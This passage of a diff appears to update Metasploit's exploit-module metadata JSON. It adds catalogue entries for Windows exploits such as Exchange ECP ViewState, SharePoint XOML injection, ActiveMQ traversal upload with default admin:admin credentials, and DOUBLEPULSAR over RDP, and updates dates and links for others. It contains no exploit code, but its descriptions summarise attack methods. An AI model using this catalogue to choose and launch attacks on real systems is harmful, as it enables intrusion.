@@ -111406,7 +112095,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2020-03-24 08:47:21 +0000",
    "path": "/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/nitro_reader_jsapi",
@@ -113071,7 +113760,7 @@
    "targets": [
      "VLC 1.1.8 on Windows XP SP3"
    ],
-    "mod_time": "2018-09-15 18:54:45 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/windows/fileformat/vlc_modplug_s3m.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/vlc_modplug_s3m",
@@ -117083,6 +117772,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/apache_activemq_traversal_upload": {
+    "name": "Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload",
+    "fullname": "exploit/windows/http/apache_activemq_traversal_upload",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2015-08-19",
+    "type": "exploit",
+    "author": [
+      "David Jorm",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache\n        ActiveMQ 5.x before 5.11.2 for Windows.\n\n        The module tries to upload a JSP payload to the /admin directory via the traversal\n        path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ\n        credentials admin:admin (or other credentials provided by the user). It then issues\n        an HTTP GET request to /admin/<payload>.jsp on the target in order to trigger the\n        payload and obtain a shell.",
+    "references": [
+      "CVE-2015-1830",
+      "EDB-40857",
+      "URL-https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 8161,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Java"
+    ],
+    "mod_time": "2020-03-05 15:03:05 +0000",
+    "path": "/modules/exploits/windows/http/apache_activemq_traversal_upload.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/apache_activemq_traversal_upload",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/apache_chunked": {
    "name": "Apache Win32 Chunked Encoding",
    "fullname": "exploit/windows/http/apache_chunked",
@@ -117990,6 +118730,72 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/http/desktopcentral_deserialization": {
+    "name": "ManageEngine Desktop Central Java Deserialization",
+    "fullname": "exploit/windows/http/desktopcentral_deserialization",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-05",
+    "type": "exploit",
+    "author": [
+      "mr_me",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a Java deserialization vulnerability in the\n        getChartImage() method from the FileStorage class within ManageEngine\n        Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n        \"The short-term fix for the arbitrary file upload vulnerability was\n        released in build 10.0.474 on January 20, 2020. In continuation of that,\n        the complete fix for the remote code execution vulnerability is now\n        available in build 10.0.479.\"",
+    "references": [
+      "CVE-2020-10189",
+      "URL-https://srcincite.io/advisories/src-2020-0011/",
+      "URL-https://srcincite.io/pocs/src-2020-0011.py.txt",
+      "URL-https://twitter.com/steventseeley/status/1235635108498948096",
+      "URL-https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x86, x64",
+    "rport": 8383,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Command",
+      "Windows Dropper",
+      "PowerShell Stager"
+    ],
+    "mod_time": "2020-03-13 17:36:05 +0000",
+    "path": "/modules/exploits/windows/http/desktopcentral_deserialization.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/desktopcentral_deserialization",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "PatchedVersion": "100474",
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "Reliability": [
+        "first-attempt-fail"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/http/desktopcentral_file_upload": {
    "name": "ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload",
    "fullname": "exploit/windows/http/desktopcentral_file_upload",
@@ -118979,6 +119785,67 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/exchange_ecp_viewstate": {
+    "name": "Exchange Control Panel ViewState Deserialization",
+    "fullname": "exploit/windows/http/exchange_ecp_viewstate",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-11",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre"
+    ],
+    "description": "This module exploits a .NET serialization vulnerability in the\n        Exchange Control Panel (ECP) web page. The vulnerability is due to\n        Microsoft Exchange Server not randomizing the keys on a\n        per-installation basis resulting in them using the same validationKey\n        and decryptionKey values. With knowledge of these, values an attacker\n        can craft a special ViewState to cause an OS command to be executed\n        by NT_AUTHORITY\\SYSTEM using .NET deserialization.",
+    "references": [
+      "CVE-2020-0688",
+      "URL-https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows (x86)",
+      "Windows (x64)",
+      "Windows (cmd)"
+    ],
+    "mod_time": "2020-03-12 18:26:01 +0000",
+    "path": "/modules/exploits/windows/http/exchange_ecp_viewstate.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/exchange_ecp_viewstate",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/ezserver_http": {
    "name": "EZHomeTech EzServer Stack Buffer Overflow Vulnerability",
    "fullname": "exploit/windows/http/ezserver_http",
@@ -119109,7 +119976,7 @@
    "targets": [
      "Windows Vista / Windows 7 (x86)"
    ],
-    "mod_time": "2019-10-08 11:44:41 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/windows/http/file_sharing_wizard_seh.rb",
    "is_install_path": true,
    "ref_name": "windows/http/file_sharing_wizard_seh",
@@ -120839,7 +121706,7 @@
    ],
    "description": "This module exploits a command injection vulnerability\n        discovered in HP SiteScope 11.30 and earlier versions (tested in 11.26\n        and 11.30). The vulnerability exists in the DNS Tool allowing an\n        attacker to execute arbitrary commands in the context of the service. By\n        default, HP SiteScope installs and runs as SYSTEM in Windows and does\n        not require authentication. This vulnerability only exists on the\n        Windows version. The Linux version is unaffected.",
    "references": [
-      "URL-https://community.rapid7.com/community/metasploit/blog/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
+      "URL-https://blog.rapid7.com/2015/10/09/r7-2015-17-hp-sitescope-dns-tool-command-injection",
      "URL-http://www8.hp.com/us/en/software-solutions/sitescope-application-monitoring/index.html"
    ],
    "platform": "Windows",
@@ -120864,7 +121731,7 @@
      "HP SiteScope 11.30 / Microsoft Windows 7 and higher",
      "HP SiteScope 11.30 / CMD"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/http/hp_sitescope_dns_tool.rb",
    "is_install_path": true,
    "ref_name": "windows/http/hp_sitescope_dns_tool",
@@ -122055,7 +122922,7 @@
    ],
    "description": "This module exploits a vulnerability found in ManageEngine Desktop Central 9. When\n        uploading a 7z file, the FileUploadServlet class does not check the user-controlled\n        ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to\n        inject a null bye at the end of the value to create a malicious file with an arbitrary\n        file type, and then place it under a directory that allows server-side scripts to run,\n        which results in remote code execution under the context of SYSTEM.\n\n        Please note that by default, some ManageEngine Desktop Central versions run on port 8020,\n        but older ones run on port 8040. Also, using this exploit will leave debugging information\n        produced by FileUploadServlet in file rdslog0.txt.\n\n        This exploit was successfully tested on version 9, build 90109 and build 91084.",
    "references": [
-      "URL-https://community.rapid7.com/community/infosec/blog/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
+      "URL-https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249",
      "CVE-2015-8249"
    ],
    "platform": "Windows",
@@ -122079,7 +122946,7 @@
    "targets": [
      "ManageEngine Desktop Central 9 on Windows"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/http/manageengine_connectionid_write.rb",
    "is_install_path": true,
    "ref_name": "windows/http/manageengine_connectionid_write",
@@ -122573,7 +123440,7 @@
    "targets": [
      "Universal Windows Target"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-26 14:53:20 +0000",
    "path": "/modules/exploits/windows/http/novell_imanager_upload.rb",
    "is_install_path": true,
    "ref_name": "windows/http/novell_imanager_upload",
@@ -123890,6 +124757,68 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/sharepoint_workflows_xoml": {
+    "name": "SharePoint Workflows XOML Injection",
+    "fullname": "exploit/windows/http/sharepoint_workflows_xoml",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-02",
+    "type": "exploit",
+    "author": [
+      "Spencer McIntyre",
+      "Soroush Dalili"
+    ],
+    "description": "This module exploits a vulnerability within SharePoint and its .NET backend\n        that allows an attacker to execute commands using specially crafted XOML data\n        sent to SharePoint via the Workflows functionality.",
+    "references": [
+      "CVE-2020-0646",
+      "URL-https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows EXE Dropper",
+      "Windows Command",
+      "Windows Powershell"
+    ],
+    "mod_time": "2020-03-24 17:14:47 +0000",
+    "path": "/modules/exploits/windows/http/sharepoint_workflows_xoml.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sharepoint_workflows_xoml",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/shoutcast_format": {
    "name": "SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow",
    "fullname": "exploit/windows/http/shoutcast_format",
@@ -124159,6 +125088,68 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/http/ssrs_navcorrector_viewstate": {
+    "name": "SQL Server Reporting Services (SSRS) ViewState Deserialization",
+    "fullname": "exploit/windows/http/ssrs_navcorrector_viewstate",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-11",
+    "type": "exploit",
+    "author": [
+      "Soroush Dalili",
+      "Spencer McIntyre"
+    ],
+    "description": "A vulnerability exists within Microsoft's SQL Server Reporting Services\n        which can allow an attacker to craft an HTTP POST request with a\n        serialized object to achieve remote code execution. The vulnerability is\n        due to the fact that the serialized blob is not signed by the server.",
+    "references": [
+      "CVE-2020-0618",
+      "URL-https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows (x86)",
+      "Windows (x64)",
+      "Windows (cmd)"
+    ],
+    "mod_time": "2020-03-09 11:43:26 +0000",
+    "path": "/modules/exploits/windows/http/ssrs_navcorrector_viewstate.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/ssrs_navcorrector_viewstate",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/http/steamcast_useragent": {
    "name": "Streamcast HTTP User-Agent Buffer Overflow",
    "fullname": "exploit/windows/http/steamcast_useragent",
@@ -125188,7 +126179,7 @@
    "needs_cleanup": true
  },
  "exploit_windows/iis/iis_webdav_scstoragepathfromurl": {
-    "name": " Microsoft IIS WebDav ScStoragePathFromUrl Overflow",
+    "name": "Microsoft IIS WebDav ScStoragePathFromUrl Overflow",
    "fullname": "exploit/windows/iis/iis_webdav_scstoragepathfromurl",
    "aliases": [

@@ -125233,7 +126224,7 @@
    "targets": [
      "Microsoft Windows Server 2003 R2 SP2 x86"
    ],
-    "mod_time": "2018-08-27 13:11:22 +0000",
+    "mod_time": "2020-03-12 01:12:00 +0000",
    "path": "/modules/exploits/windows/iis/iis_webdav_scstoragepathfromurl.rb",
    "is_install_path": true,
    "ref_name": "windows/iis/iis_webdav_scstoragepathfromurl",
@@ -129002,7 +129993,7 @@
      "phra",
      "lupman"
    ],
-    "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n        to achieve a SYSTEM handle for elevation of privilege.\n        It requires a CLSID string.",
+    "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n        to achieve a SYSTEM handle for elevation of privilege.\n        It requires a CLSID string.\n        Windows 10 after version 1803, (April 2018 update, build 17134) and all\n        versions of Windows Server 2019 are not vulnerable.",
    "references": [
      "MSB-MS16-075",
      "CVE-2016-3225",
@@ -129024,7 +130015,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-01-12 04:32:21 +0000",
+    "mod_time": "2020-02-21 08:33:20 +0000",
    "path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb",
    "is_install_path": true,
    "ref_name": "windows/local/ms16_075_reflection_juicy",
@@ -129894,6 +130885,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/local/ricoh_driver_privesc": {
+    "name": "Ricoh Driver Privilege Escalation",
+    "fullname": "exploit/windows/local/ricoh_driver_privesc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-01-22",
+    "type": "exploit",
+    "author": [
+      "Alexander Pudwill",
+      "Pentagrid AG",
+      "Shelby Pace"
+    ],
+    "description": "Various Ricoh printer drivers allow escalation of\n        privileges on Windows systems.\n\n        For vulnerable drivers, a low-privileged user can\n        read/write files within the `RICOH_DRV` directory\n        and its subdirectories.\n\n        `PrintIsolationHost.exe`, a Windows process running\n        as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n        during the installation of a printer. A user can\n        elevate to SYSTEM by writing a malicious DLL to\n        the vulnerable driver directory and adding a new\n        printer with a vulnerable driver.\n\n        This module leverages the `prnmngr.vbs` script\n        to add and delete printers. Multiple runs of this\n        module may be required given successful exploitation\n        is time-sensitive.",
+    "references": [
+      "CVE-2019-19363",
+      "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2020-02-06 14:11:42 +0000",
+    "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/ricoh_driver_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "service-resource-loss"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/run_as": {
    "name": "Windows Run Command As User",
    "fullname": "exploit/windows/local/run_as",
@@ -130221,6 +131263,54 @@
    },
    "needs_cleanup": true
  },
+  "exploit_windows/local/windscribe_windscribeservice_priv_esc": {
+    "name": "Windscribe WindscribeService Named Pipe Privilege Escalation",
+    "fullname": "exploit/windows/local/windscribe_windscribeservice_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-05-24",
+    "type": "exploit",
+    "author": [
+      "Emin Ghuliev",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "The Windscribe VPN client application for Windows makes use of a\n        Windows service `WindscribeService.exe` which exposes a named pipe\n        `\\.\\pipe\\WindscribeService` allowing execution of programs with\n        elevated privileges.\n\n        Windscribe versions prior to 1.82 do not validate user-supplied\n        program names, allowing execution of arbitrary commands as SYSTEM.\n\n        This module has been tested successfully on Windscribe versions\n        1.80 and 1.81 on Windows 7 SP1 (x64).",
+    "references": [
+      "CVE-2018-11479",
+      "URL-http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html",
+      "URL-https://pastebin.com/eLG3dpYK"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-02-01 00:41:07 +0000",
+    "path": "/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/windscribe_windscribeservice_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "needs_cleanup": true
+  },
  "exploit_windows/local/wmi": {
    "name": "Windows Management Instrumentation (WMI) Remote Command Execution",
    "fullname": "exploit/windows/local/wmi",
@@ -130861,7 +131951,7 @@
    "author": [
      "Manuel Feifel"
    ],
-    "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n        AIS logistic software. The server typically listens on port 5099 without TLS.\n        There could also be server listening on 5100 with TLS but the port 5099 is\n        usually always open.\n        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n        with the 'sa' user is in place.\n\n        This module was verified on version 67 but it should also run on lower versions.\n        An fixed version was created by AIS in September 2017. However most systems\n        have not been updated.\n\n        In regard to the payload, unless there is a closed port in the web server,\n        you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n        probably to your port 80 or to any other outbound port allowed on the firewall.\n\n        Currently, one delivery method is supported\n\n        This method takes advantage of the Command Stager subsystem. This allows using\n        various techniques, such as using a TFTP server, to send the executable. By default\n        the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n        NOTE: This module will leave a payload executable on the target system when the\n        attack is finished.",
+    "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n          AIS logistic software. The server typically listens on port 5099 without TLS.\n          There could also be server listening on 5100 with TLS but the port 5099 is\n          usually always open.\n          The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n          with the 'sa' user is in place.\n\n          This module was verified on version 67 but it should also run on lower versions.\n          An fixed version was created by AIS in September 2017. However most systems\n          have not been updated.\n\n          In regard to the payload, unless there is a closed port in the web server,\n          you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n          probably to your port 80 or to any other outbound port allowed on the firewall.\n\n          Currently, one delivery method is supported\n\n          This method takes advantage of the Command Stager subsystem. This allows using\n          various techniques, such as using a TFTP server, to send the executable. By default\n          the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n          NOTE: This module will leave a payload executable on the target system when the\n          attack is finished.",
    "references": [
      "CVE-2019-10123"
    ],
@@ -130877,7 +131967,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-25 18:24:26 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/ais_esel_server_rce",
@@ -131923,6 +133013,50 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/misc/crosschex_device_bof": {
+    "name": "Anviz CrossChex Buffer Overflow",
+    "fullname": "exploit/windows/misc/crosschex_device_bof",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-11-28",
+    "type": "exploit",
+    "author": [
+      "Luis Catarino <lcatarino@protonmail.com>",
+      "Pedro Rodrigues <pedrosousarodrigues@protonmail.com>",
+      "agalway-r7",
+      "adfoster-r7"
+    ],
+    "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n          triggering a stack buffer overflow.",
+    "references": [
+      "CVE-2019-12518",
+      "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html",
+      "EDB-47734"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Crosschex Standard x86 <= V4.3.12"
+    ],
+    "mod_time": "2020-03-05 14:48:37 +0000",
+    "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/crosschex_device_bof",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/disk_savvy_adm": {
    "name": "Disk Savvy Enterprise v10.4.18",
    "fullname": "exploit/windows/misc/disk_savvy_adm",
@@ -132747,7 +133881,7 @@
      "CVE-2012-0124",
      "OSVDB-80105",
      "BID-52431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
+      "URL-https://blog.rapid7.com/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
    ],
    "platform": "Windows",
    "arch": "",
@@ -132762,7 +133896,7 @@
      "HP Data Protector Express 6.0.00.11974 / Windows XP SP3",
      "HP Data Protector Express 5.0.00.59287 / Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/hp_dataprotector_new_folder",
@@ -136091,7 +137225,7 @@
    "references": [
      "CVE-2012-4959",
      "OSVDB-87573",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "Windows",
    "arch": "",
@@ -136114,7 +137248,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb",
    "is_install_path": true,
    "ref_name": "windows/novell/file_reporter_fsfui_upload",
@@ -137139,6 +138273,63 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/rdp/rdp_doublepulsar_rce": {
+    "name": "RDP DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Tom Sellers",
+      "Spencer McIntyre"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for RDP.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "URL-https://github.com/countercept/doublepulsar-detection-script"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 3389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-01-29 13:16:02 +0000",
+    "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/rdp/rdp_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "exploit/windows/smb/smb_doublepulsar_rce"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/abb_wserver_exec": {
    "name": "ABB MicroSCADA wserver.exe Remote Code Execution",
    "fullname": "exploit/windows/scada/abb_wserver_exec",
@@ -138504,7 +139695,7 @@
    "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.",
    "references": [
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
      "CVE-2014-0784"
    ],
    "platform": "Windows",
@@ -138519,7 +139710,7 @@
    "targets": [
      "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkbcopyd_bof",
@@ -138546,7 +139737,7 @@
    "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability\n        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n        insecure usage of memcpy, using attacker controlled data as the size count. This module\n        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
    "references": [
      "CVE-2014-0782",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf"
    ],
    "platform": "Windows",
@@ -138561,7 +139752,7 @@
    "targets": [
      "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkesimmgr_bof",
@@ -138590,7 +139781,7 @@
      "CVE-2014-3888",
      "URL-http://jvn.jp/vu/JVNVU95045914/index.html",
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
+      "URL-https://blog.rapid7.com/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
    ],
    "platform": "Windows",
    "arch": "",
@@ -138604,7 +139795,7 @@
    "targets": [
      "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3"
    ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkfsim_vhfd",
@@ -138631,7 +139822,7 @@
    "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
    "references": [
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
      "CVE-2014-0783"
    ],
    "platform": "Windows",
@@ -138646,7 +139837,7 @@
    "targets": [
